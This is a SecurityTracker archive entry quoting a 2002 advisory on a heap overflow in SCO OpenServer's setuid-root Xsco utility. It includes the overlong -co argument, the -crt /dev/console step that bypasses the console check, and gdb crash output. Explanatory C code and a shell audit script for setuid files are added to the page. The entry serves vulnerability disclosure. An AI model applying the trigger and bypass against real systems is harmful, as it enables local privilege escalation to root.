SecurityTracker Archives
Category:   Application (Generic)  >   Xsco
Vendors:   Caldera/SCO
Caldera/SCO OpenServer Xsco Utility Heap Overflow May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1004514
SecurityTracker URL:  http://securitytracker.com/id/1004514
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 11 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A heap overflow has been reported in Caldera's (SCO's) OpenServer Xsco utility. A local user may be able to obtain root level privileges on the system.

Strategic Reconnaissance Team issued an advisory warning that the SCO OpenServer Xsco application contains the same heap overflow that was previously reported in Xsun.

By default, the SCO OpenServer Xsco application is installed with set user id (suid) root privileges. A local user could exploit this overflow to gain root access on the system.

A demonstration exploit transcript is provided:

bash-2.03$ ./Xsco :1 -co <b0f here> -crt /dev/console

Tue Jun 11 10:32:59 2002
Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation Fault

The vendor has reportedly been notified.
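The entry above attributes the flaw to a boundary error in how a setuid-root binary handles the path passed via -co, and the advisory's backtrace further down (a fault inside malloc() with eax holding 0x41414141) is the signature of a heap chunk whose allocator metadata has been overwritten. As an added illustration, not Xsco's code and not part of the advisory, the C below shows the general shape of that defect beside its hardened form: an argument copied into a fixed-size heap buffer with no length check, and the same copy done only after the length has been validated. The names load_rgb_path_unsafe, load_rgb_path_safe, safe_accepts and the constant RGB_PATH_MAX are assumptions for the example; the real Xsco buffer size is not stated on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed heap buffer holding an RGB database path.
 * The actual Xsco buffer size is not given in the advisory. */
#define RGB_PATH_MAX 256

/* Vulnerable pattern: a caller-controlled argument is copied into a
 * fixed-size heap chunk without any bound. Called with an argument
 * longer than RGB_PATH_MAX - 1 bytes it writes past the chunk and
 * corrupts the neighbouring allocator metadata, which is why a later
 * malloc() call is where such a program faults. Shown for contrast
 * only; the demonstration below never calls it with oversized input. */
char *load_rgb_path_unsafe(const char *arg)
{
    char *path = malloc(RGB_PATH_MAX);
    if (path == NULL)
        return NULL;
    strcpy(path, arg);   /* unbounded copy: the defect */
    return path;
}

/* Hardened pattern: measure the argument against the limit first,
 * refuse anything that does not fit (rather than truncating silently,
 * which would turn a path into a different path), then copy with an
 * explicit length. memchr is used instead of strnlen so the code is
 * plain C89 and does not read beyond RGB_PATH_MAX bytes. */
char *load_rgb_path_safe(const char *arg)
{
    const char *nul = memchr(arg, '\0', RGB_PATH_MAX);
    if (nul == NULL)
        return NULL;          /* no terminator within the limit: too long */
    size_t len = (size_t)(nul - arg);
    char *path = malloc(len + 1);
    if (path == NULL)
        return NULL;
    memcpy(path, arg, len);
    path[len] = '\0';
    return path;
}

/* Builds an argument of arg_len 'A' bytes (the advisory used 9000) and
 * reports whether the hardened loader accepts it: 1 accepted, 0 rejected,
 * -1 on allocation failure. */
int safe_accepts(size_t arg_len)
{
    char *arg = malloc(arg_len + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', arg_len);
    arg[arg_len] = '\0';
    char *path = load_rgb_path_safe(arg);
    int accepted = (path != NULL);
    free(path);
    free(arg);
    return accepted;
}

int main(void)
{
    printf("255-byte path: %s\n", safe_accepts(255) ? "accepted" : "rejected");
    printf("256-byte path: %s\n", safe_accepts(256) ? "accepted" : "rejected");
    printf("9000-byte path: %s\n", safe_accepts(9000) ? "accepted" : "rejected");
    return 0;
}
```

The point of the hardened version is the order of operations: length is checked before any allocation or copy, and the buffer is sized from the validated length rather than from a constant the input is later assumed to respect.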

Impact:   A local user may be able to execute arbitrary code with root privileges and thereby gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.caldera.com/
Cause:   Boundary error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  OpenServer 5.x

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Caldera Issues Fix for Open UNIX/UnixWare) Caldera/SCO OpenServer Xsco Utility Heap Overflow May Let Local Users Gain Root Privileges
Caldera has released a fix.



 Source Message Contents

Subject:  SCO Openserver Xsco heap overflow.


======================================================================

Strategic Reconnaissance Team Security Advisory (SRT2002-06-11-1037)

Topic  : SCO OpenServer Xsco heap overflow
Date   : June 11, 2002
Credit : KF dotslash[at]snosoft.com
Site   : http://www.snosoft.com

======================================================================

.: Description:
---------------

 The SCO OpenServer Xsco application is installed setuid root by
 default. Xsco contains the same heap overflow that Xsun has.

 bash-2.03$ cd /opt/K/SCO/XServer/5.2.2a/usr/bin/X11
 bash-2.03$ ls -al Xsco
 -rwsr-xr-x   1 root     bin      1333588 Dec  9  1999 Xsco

 If you attempt the same syntax used to overflow Xsun it appears
 to be non-exploitable due to not having console permission. This
 is easily bypassed as shown below in the Impact section.

 bash-2.03$ ./Xsco :1 -co `perl -e 'print "A" x 9000'`

 Tue Jun 11 10:31:56 2002
 The X Server must be run on the console.
 Make sure you are not on a serial line
 and are not using rlogin or usemouse.

.: Impact:
----------

 If properly exploited the following could be used to take root
 on the server with the Xsco binary.

 bash-2.03$ ./Xsco :1 -co <b0f here> -crt /dev/console

 Tue Jun 11 10:32:59 2002
 Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ...
 Segmentation Fault

 0x8164073 in _grantpt ()
 (gdb) bt
 #0  0x8164073 in _grantpt ()
 #1  0x8164532 in malloc ()
 #2  0x80027103 in _s_a_get ()
 #3  0x81594bc in _ptsname ()
 #4  0x8087526 in wctype ()
 #5  0x8085e95 in wctype ()
 #6  0x80745f4 in wctype ()
 #7  0x804d69b in wctype ()

 (gdb) i r
 eax            0x41414141       1094795585
 ecx            0x495b38d4       1230715092
 edx            0x0      0
 ebx            0x18     24
 esp            0x8045814        0x8045814
 ebp            0x8045834        0x8045834
 esi            0x41414140       1094795584
 edi            0x819f794        135919508
 eip            0x8164073        0x8164073

.: Systems Affected:
--------------------

 SCO/Caldera OpenServer 5.x

.: Solution:
------------

 The vendor was notified and is diligently working on a fix.
 A work around is currently unknown.

======================================================================


-KF
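Both the SecurityTracker summary and the advisory rest on one host-level fact: Xsco is installed setuid root, visible as the `s` in the `-rwsr-xr-x` mode of the `ls -al` output quoted above. The following is an added audit helper, not part of the advisory, for confirming that on a system: it lists setuid files owned by a given user under a directory (the X server path is the one the advisory shows) and also parses `ls -l` style lines so an inventory captured elsewhere can be checked offline. The sample listing lines are constructed for the example and the function names are my own.

```shell
#!/bin/sh
# Added audit helper (not from the advisory): locate setuid binaries and
# flag setuid-root entries in "ls -l" style output.

# Print every regular file under DIR with the setuid bit set and owned by
# OWNER (default root). For the path quoted in the advisory:
#   find_setuid_files /opt/K/SCO/XServer root
find_setuid_files() {
    dir=$1
    owner=${2:-root}
    find "$dir" -type f -perm -4000 -user "$owner" 2>/dev/null
}

# Return 0 when a ten-character mode string such as "-rwsr-xr-x" carries
# the setuid bit: an 's' (setuid + exec) or 'S' (setuid, no exec) in the
# owner-execute position.
mode_is_setuid() {
    case "$1" in
        ???s??????|???S??????) return 0 ;;
        *) return 1 ;;
    esac
}

# Read "ls -l" lines on stdin (mode links owner group size month day
# year-or-time name) and print those that are setuid and owned by root.
report_setuid_root() {
    while read -r mode links owner group size month day year name; do
        [ -z "$mode" ] && continue
        if mode_is_setuid "$mode" && [ "$owner" = "root" ]; then
            printf 'SETUID ROOT: %s (%s)\n' "$name" "$mode"
        fi
    done
}

# Constructed sample, modelled on the ls -al line quoted in the advisory
# plus two entries that must not be flagged (no setuid bit; setuid but
# not root-owned).
SAMPLE_LISTING='-rwsr-xr-x 1 root bin 1333588 Dec 9 1999 Xsco
-rwxr-xr-x 1 root bin 12345 Dec 9 1999 xterm
-rwsr-xr-x 1 bin bin 4096 Dec 9 1999 notroot'

printf '%s\n' "$SAMPLE_LISTING" | report_setuid_root
```

Run against a live host, `find_setuid_files` is the authoritative check because it reads the inode mode directly; the `ls -l` parser is for reviewing listings collected from systems you cannot log into.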


Copyright 2020, SecurityGlobal.net LLC